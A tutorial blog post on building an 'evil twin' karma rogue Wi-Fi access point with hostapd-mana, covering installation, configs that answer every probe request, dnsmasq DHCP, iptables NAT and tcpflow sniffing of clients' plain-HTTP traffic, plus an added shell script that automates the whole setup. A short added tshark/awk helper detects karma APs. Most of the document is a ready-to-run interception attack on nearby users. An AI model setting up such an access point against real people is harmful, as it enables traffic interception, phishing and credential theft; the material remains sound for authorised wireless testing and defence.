Fake AP: How to Create an Evil Twin Karma Access Point

by hash3liZer . 05 June 2019


Karma refers to a set of patches and modifications that make a wireless access point answer every probe request frame it sees. Probe requests are the 802.11 management frames that clients such as phones and laptops send to discover the access points in range.

Devices normally try to reconnect to access points they already know, and they find out whether a known AP is in range by sending probe requests and listening for probe responses. Many clients probe for their saved networks by name (a directed probe request), which reveals the SSIDs they are looking for.

In this scenario karma is used so that our rogue access point answers every probe request with a probe response claiming to be whatever network was asked for, regardless of the requested SSID. The attack can be widened further by also beaconing a few commonly used network names, such as a company name or a well-known hotspot, to draw in traffic faster.


However, clients compare the security settings of the responding AP with the saved profile before associating. A device that saved a WPA2-protected network will usually not auto-connect to an open AP claiming the same SSID, and one that does start associating will drop the connection quickly once the security type turns out to mismatch. The networks an open karma AP reliably captures are the open ones saved on the client, such as hotel, airport and cafe hotspots.

Hostapd-Mana:

Hostapd-Mana is a modified version of the original hostapd with additional functionality for building a rogue access point. It can be used for reconnaissance, such as logging probe activity, and for running the karma attack itself.

STEP 1

Installation

If you happen to be running Kali or Parrot, you can directly install the mana-toolkit using the package manager:

$ apt update
$ apt install mana-toolkit dnsmasq

Make sure you install dnsmasq even if you are not installing mana-toolkit from the package manager.

If that's not the case, or you want to build from the sources, follow the usual hostapd build: install the dependencies and compile the hostapd/ directory of the GitHub repository:

$ apt install build-essential libssl-dev libnl-genl-3-dev
$ git clone https://github.com/sensepost/hostapd-mana
$ cd hostapd-mana/
$ make -C hostapd
$ make -C hostapd install

The install target lives in hostapd/Makefile and places hostapd and hostapd_cli under BINDIR (/usr/local/bin by default); without it the binaries stay in the hostapd/ directory. The mana-toolkit package instead installs them under:

/usr/lib/mana-toolkit/hostapd
/usr/lib/mana-toolkit/hostapd_cli

The paths below assume the package; adjust them for a source build.

You can verify the installation by printing the version of the binary:

$ /usr/lib/mana-toolkit/hostapd -v

Finally, symlink both binaries into a directory on the PATH so we don't have to type the full path each time we want to access the tool:

$ ln -s /usr/lib/mana-toolkit/hostapd /usr/bin/mana-hostapd
$ ln -s /usr/lib/mana-toolkit/hostapd_cli /usr/bin/mana_hostapd_cli

STEP 2

Evil Twin Karma AP

Let's host our Evil Twin access point. Since Mana is an extended version of the original hostapd, the basic hostapd configuration works here as well; we only extend it for the evil twin:

$ nano hostapd.conf
interface=wlan1mon
driver=nl80211
ssid=[Fake AP Name] 
hw_mode=g
channel=[Fake AP Channel]

enable_mana=1

The enable_mana line is what activates the karma attack. In this default mode, when a device sends a directed probe request for a specific SSID, mana answers that device with a probe response carrying the SSID it asked for, so the evil twin looks like the network the device is searching for. Each device is only offered the networks it probed for itself.

The other mode is loud mode. Here mana answers every probe request with a probe response for every SSID it has seen from any device, so all nearby clients are offered the whole collected list. This floods the clients' network lists with non-existent access points and is easy to notice, but it casts a wider net. If you still want loud mode, add this line:

mana_loud=1

Note the args:

  • interface: Wireless interface that hosts the fake access point. hostapd switches it into AP mode itself, so it must not be held by NetworkManager or wpa_supplicant (airmon-ng check kill frees it).
  • ssid: Name of the rogue access point, which is what it beacons.
  • channel: Channel for the rogue access point.
  • enable_mana: Enable mana mode, which is the karma behaviour described above.
  • mana_loud: Enable mana loud mode. Every probe request is answered with every SSID seen so far.

Finally, launch the Fake Access Point:

$ mana-hostapd hostapd.conf 


STEP 3

Evil Twin DHCP

Next, we need a DHCP server to turn the access point into a usable network, so that connecting devices get an address and can reach the gateway and each other. Prepare a simple configuration file for dnsmasq:

$ nano dnsmasq.conf
interface=wlan1mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Before starting dnsmasq, assign the gateway address to the AP interface, so that dnsmasq can bind to it and has a subnet to hand out leases from. The connected route for 192.168.1.0/24 is added automatically with the address, so no separate route command is needed:

$ ip addr add 192.168.1.1/24 dev wlan1mon
$ ip link set wlan1mon up

Then fire up DHCP in the foreground so the lease and query logs stay visible:

$ dnsmasq -C dnsmasq.conf -d

STEP 4

Internet Access

To perform a more extensive MITM attack, let's give the evil twin clients Internet access. For that we need a second wired or wireless interface that is connected to the Internet.

Supposing the upstream connection is on eth0 (substitute wlan0 if it is a wireless link), NAT the clients' traffic out of that interface and allow forwarding in both directions between it and the AP interface. The second FORWARD rule matters when the chain's default policy is DROP; without it, replies never reach the clients:

$ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
$ iptables --append FORWARD --in-interface wlan1mon --out-interface eth0 -j ACCEPT
$ iptables --append FORWARD --in-interface eth0 --out-interface wlan1mon -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

Note the parameters:

  • --out-interface: the interface through which traffic leaves. In the nat rule this is the upstream link, and MASQUERADE rewrites the clients' source address to that interface's address.
  • --in-interface: the interface on which the traffic arrives. The first FORWARD rule passes client traffic from wlan1mon towards the Internet, the second lets the replies back in.

Finally, enable IP forwarding in the kernel, otherwise none of the forwarding rules ever see a packet:

$ echo 1 > /proc/sys/net/ipv4/ip_forward
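The following script is added here as a worked example and is not part of the original post or of the hostapd-mana project. It ties steps 2 to 4 together: it renders the hostapd-mana and dnsmasq configurations from the values above, starts hostapd, addresses the AP interface before dnsmasq is started, and sets up NAT with forwarding allowed in both directions. The interface names (wlan1mon for the AP, eth0 upstream), the 192.168.1.0/24 subnet, the bind-interfaces option in the dnsmasq config and the mana-hostapd symlink name are assumptions; adjust them to your lab.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes the AP interface is
# wlan1mon, the upstream link is eth0 and the hostapd-mana binary is reachable
# as mana-hostapd (the symlink created in STEP 1). Run as root.
set -eu

AP_IF="${AP_IF:-wlan1mon}"
UP_IF="${UP_IF:-eth0}"
GW="192.168.1.1"
PREFIX="24"

# Render a hostapd-mana config. $4 selects mana_loud: 0 (default) answers each
# device only with the SSIDs it probed for, 1 answers every probe with every
# SSID seen so far.
gen_hostapd_conf() {
    iface="$1"; ssid="$2"; channel="$3"; loud="${4:-0}"
    cat <<EOF
interface=$iface
driver=nl80211
ssid=$ssid
hw_mode=g
channel=$channel
enable_mana=1
mana_loud=$loud
EOF
}

# Render the dnsmasq config from STEP 3. bind-interfaces (an assumption here)
# keeps dnsmasq off the other interfaces so it does not clash with a resolver
# already listening on the host.
gen_dnsmasq_conf() {
    iface="$1"; gw="$2"
    cat <<EOF
interface=$iface
bind-interfaces
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,$gw
dhcp-option=6,$gw
server=8.8.8.8
log-queries
log-dhcp
EOF
}

# Bring everything up: hostapd in the background, then the address (so dnsmasq
# has a subnet to serve), then NAT and forwarding, then dnsmasq in the foreground.
bring_up() {
    ssid="$1"; channel="$2"; loud="${3:-0}"
    gen_hostapd_conf "$AP_IF" "$ssid" "$channel" "$loud" > hostapd.conf
    gen_dnsmasq_conf "$AP_IF" "$GW" > dnsmasq.conf

    mana-hostapd -B hostapd.conf        # -B: daemonise; hostapd puts the interface in AP mode
    sleep 2
    ip addr flush dev "$AP_IF"
    ip addr add "$GW/$PREFIX" dev "$AP_IF"
    ip link set "$AP_IF" up

    sysctl -w net.ipv4.ip_forward=1 >/dev/null
    iptables -t nat -A POSTROUTING -o "$UP_IF" -j MASQUERADE
    iptables -A FORWARD -i "$AP_IF" -o "$UP_IF" -j ACCEPT
    iptables -A FORWARD -i "$UP_IF" -o "$AP_IF" \
        -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

    dnsmasq -C dnsmasq.conf -d          # foreground; Ctrl-C stops DHCP/DNS
}

# Usage: ./evil-twin.sh <ssid> <channel> [loud]. With fewer than two arguments
# nothing is touched, so the functions above can be sourced and inspected safely.
if [ "$#" -ge 2 ]; then
    bring_up "$@"
fi
```

Stopping the AP afterwards means killing the backgrounded hostapd and removing the three iptables rules; the script does not do that for you.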

STEP 5

Sniffing (MITM)

I am not diving deep into how to setup a phishing site with evil twin here. You can have a read for this here in this tutorial:

Setup Fake (Rogue) Access Point on Linux | hostapd

For MITM we have a couple of choices. Let's fire up tcpflow to capture the data flowing through the network. One thing to keep in mind: traffic on port 443 is TLS-encrypted, so tcpflow only shows ciphertext and cannot decode it. A site that uses HTTPS is therefore largely protected from this kind of passive MITM; what we can read in the clear is plain HTTP on port 80.

$ tcpflow -i any -C -g port 80


Note the args:

  • -i: interface to listen on (any captures on all interfaces).
  • -C: print the flows to the console instead of writing them to files; -g colours them to tell flows apart.
  • port 80: a BPF capture filter. Several ports are combined with or, for example port 80 or port 8080.

STEP 6

Probe Capture with Wireshark

We have done all of the configuration. However, we still have to verify whether the attack vector actually works, which means looking at the wireless traffic. Fire up Wireshark on the monitor interface and add the following display filter:

wlan.fc.type_subtype == 0x05

This shows only probe response frames (filtering on wlan.fc.subtype alone would also match data frames with subtype 5). If you see probe responses whose BSSID is our evil twin's but whose SSID differs from the one set in the hostapd configuration, the karma access point is working: it is answering devices with the networks they asked for.
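As an added example, not part of the original post, here is a small shell helper that does the same verification from tshark output, and that a defender can use in reverse to spot a karma AP on the air: it groups probe responses by BSSID and reports how many distinct SSIDs each BSSID has answered with. A normal AP answers with one SSID per BSSID; a karma AP answers with whatever it was asked for. The tshark capture command, the monitor interface name wlan0mon and the sample frames are assumptions; the sample data is constructed, not captured.

```shell
#!/bin/sh
# Added example, not from the original post. Pipe tshark's tab-separated
# probe-response dump into karma_ssids_per_bssid, e.g. (monitor interface
# wlan0mon assumed):
#   tshark -i wlan0mon -Y 'wlan.fc.type_subtype == 0x05' \
#          -T fields -e wlan.bssid -e wlan.ssid | karma_ssids_per_bssid
set -eu

# Reads "bssid<TAB>ssid" lines; prints "bssid<TAB>count<TAB>ssid1,ssid2,...",
# one line per BSSID, counting each distinct SSID once. Wildcard (empty) SSIDs
# are ignored.
karma_ssids_per_bssid() {
    awk -F'\t' '
        NF >= 2 && $2 != "" {
            key = $1 SUBSEP $2
            if (!(key in seen)) {
                seen[key] = 1
                count[$1]++
                list[$1] = list[$1] (list[$1] == "" ? "" : ",") $2
            }
        }
        END { for (b in count) printf "%s\t%d\t%s\n", b, count[b], list[b] }
    ' | sort
}

# Prints the BSSIDs that answered with more than $1 distinct SSIDs (default 1).
# A BSSID listed here is either a karma AP or one that really hosts several
# networks on a single BSSID, which is unusual and worth a look either way.
flag_karma() {
    threshold="${1:-1}"
    karma_ssids_per_bssid | awk -F'\t' -v t="$threshold" '$2 > t { print $1 }'
}

# Constructed sample in tshark -T fields format (bssid, tab, ssid). The first
# BSSID answers three different SSIDs (karma behaviour); the second answers one.
sample_frames() {
    printf '%s\t%s\n' \
        00:11:22:33:44:55 CorpWiFi \
        00:11:22:33:44:55 HomeNet \
        00:11:22:33:44:55 CorpWiFi \
        00:11:22:33:44:55 CafeGuest \
        aa:bb:cc:dd:ee:ff CafeGuest
}

# Usage: ./karma-check.sh demo   (runs the functions on the constructed sample)
if [ "${1:-}" = "demo" ]; then
    sample_frames | karma_ssids_per_bssid
    echo "karma suspects:"
    sample_frames | flag_karma
fi
```

On the demo data the first BSSID is reported with three SSIDs and flagged, the second with one and left alone. On a live capture, run it for a minute or two in a busy place: a single BSSID accumulating many unrelated SSIDs is the signature of the setup built in this post.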

Conclusion

We can draw more devices to our access point by forging probe responses (and beacons) for the networks they already trust. Doing this through manual configuration would be quite complicated; hostapd-mana provides an extended version of hostapd that handles it and that can be used for a number of other purposes as well.